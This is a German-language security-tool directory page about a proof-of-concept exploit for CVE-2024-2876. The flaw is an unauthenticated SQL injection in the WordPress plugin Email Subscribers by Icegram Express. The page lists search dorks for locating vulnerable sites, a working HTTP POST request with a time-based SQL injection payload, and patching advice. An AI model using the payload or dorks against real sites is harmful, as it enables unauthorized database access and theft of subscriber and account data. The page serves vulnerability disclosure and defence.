Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-2876 — Proof-of-Concept-Exploit für CVE-2024-2876, eine kritische SQL-Injection im WordPress-Plugin Email Subscribers by Icegram Express, die es nicht authentifizierten Angreifern ermöglicht, beliebige SQL-Abfragen auszuführen. | Kitploit
Tools/GitHubGitHub/aerchy/cve-2024-2876
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubaerchy/cve-2024-2876

CVE-2024-2876

Proof-of-Concept-Exploit für CVE-2024-2876, eine kritische SQL-Injection im WordPress-Plugin Email Subscribers by Icegram Express, die es nicht authentifizierten Angreifern ermöglicht, beliebige SQL-Abfragen auszuführen.

Repository anzeigen
2vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-2876 - SQL-Injection-Schwachstelle in Email Subscribers von Icegram Express

Überblick

CVE-2024-2876 ist eine kritische Sicherheitslücke im Plugin „Email Subscribers by Icegram Express" für WordPress. Diese Schwachstelle betrifft Versionen bis einschließlich 5.7.14 und stellt ein erhebliches Risiko für über 90.000 Websites dar.

Details zur Schwachstelle

  • CVE-ID: CVE-2024-2876
  • CVSS-Score: 9.8 (Kritisch)
  • Betroffene Versionen: Bis 5.7.14
  • Gepatchte Version: 5.7.15 und höher

Beschreibung

Bei der Schwachstelle handelt es sich um einen SQL-Injection-Fehler, der nicht authentifizierten Angreifern die Ausführung bösartiger SQL-Abfragen auf den betroffenen WordPress-Datenbanken ermöglicht. Durch die Manipulation von Benutzereingaben, die nicht ordnungsgemäß bereinigt werden, können Angreifer vertrauliche Informationen wie Benutzernamen, E-Mail-Adressen, Passwort-Hashes und Abonnentenlisten extrahieren.

Exploit-Mechanismus

Die SQL-Injection tritt innerhalb der run-Funktion der -Klasse des Plugins auf, wo eine unzureichende Eingabevalidierung zur unbefugten Ausführung von SQL-Code führt. Dies gefährdet die Integrität und Vertraulichkeit der in der WordPress-Datenbank gespeicherten Daten.

IG_ES_Subscribers_Query

Dorks CVE-2024-2876

  • FOFA : body="/wp-content/plugins/email-subscribers/"

  • publicwww : "/wp-content/plugins/email-subscribers/"

POC CVE-2024-2876

root@kitploit:~
POST /wp-admin/admin-post.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111

Empfehlungen

  1. Sofortiges Update: Wenn Sie das Plugin „Email Subscribers by Icegram Express" verwenden, aktualisieren Sie es umgehend auf Version 5.7.15 oder höher, um den Sicherheitspatch anzuwenden.

  2. Regelmäßige Audits: Überprüfen und aktualisieren Sie regelmäßig alle WordPress-Plugins und -Themes auf die neuesten Versionen, um die Sicherheit zu gewährleisten.

  3. Sicherheits-Plugins: Verwenden Sie seriöse WordPress-Sicherheits-Plugins, um den Schutz gegen SQL-Injection und andere Cyber-Bedrohungen zu verbessern.

  4. Starke Passwortrichtlinien: Implementieren Sie starke und eindeutige Passwörter für alle Konten, die mit Ihrer WordPress-Website verbunden sind, um das Risiko unbefugten Zugriffs zu verringern.

Auswirkungen bei Nichtbeachtung

Wenn das betroffene Plugin nicht aktualisiert wird, bleiben Websites anfällig für Datenverletzungen und unbefugten Zugriff. Angesichts der weiten Verbreitung dieses Plugins ist sofortiges Handeln entscheidend, um Installationen abzusichern.

Tool herunterladen